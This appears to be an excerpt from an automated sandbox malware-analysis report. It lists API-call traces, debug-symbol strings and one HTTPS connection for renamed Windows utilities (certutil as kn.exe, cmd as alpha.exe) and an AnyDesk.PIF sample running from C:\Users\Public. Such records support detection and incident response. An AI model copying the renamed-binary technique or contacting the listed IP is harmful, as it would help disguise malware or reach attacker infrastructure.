          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685484070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF685484070
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854460DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF6854460DA
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6854B9F90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6854B5FA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685485F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF685485F54
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF68544FF64
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF685515FF0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF685445FE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515AA8 CryptDecodeObjectEx,7_2_00007FF685515AA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF6854DFA84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CBA50 CryptSignCertificate,SetLastError,7_2_00007FF6854CBA50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B1A44
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685443A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685443A40
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B7A70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF6854C9A58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685473B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF685473B14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6854A9AF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685447988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF685447988
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF68549597C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68550B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF68550B980
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B950 I_CryptGetLruEntryData,#357,7_2_00007FF68549B950
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546F944 CryptDecodeObject,GetLastError,#357,7_2_00007FF68546F944
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF6854D9970
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EBA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF6854EBA14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF68549B9CC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68543F9B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF6854A1C84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685451C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF685451C50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF685515C54
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685463C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF685463C60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DFD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF6854DFD2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF6854CDD1C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF6854A5CE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF6854DFB94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF68543BB80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515B90 CryptDecodeObjectEx,memmove,7_2_00007FF685515B90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685415BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF685415BA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF6854BFB50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EBB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF6854EBB50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E5B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF6854E5B44
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68547BB38
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF6854E7B60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68546FC34
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68544FC20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685439BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF685439BC8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6854BBBC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B3BEB
          Source: unknownHTTPS traffic detected: 185.102.77.43:443 -> 192.168.2.8:49706 version: TLS 1.2
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdbGCTL source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
          Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1446334242.00000000029F1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.00000000219CF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535026723.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.0000000021A00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
          Source: Binary string: SndVol.pdb source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6E9421560
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6E9447B4C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6E9421560
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6E9447B4C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68548C6F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF6854F234C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F3100
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F10C4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF6854F6F80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF6854D3674
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68549D4A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68545D440
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68549B3D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685495E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF685495E58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF6854F1B04
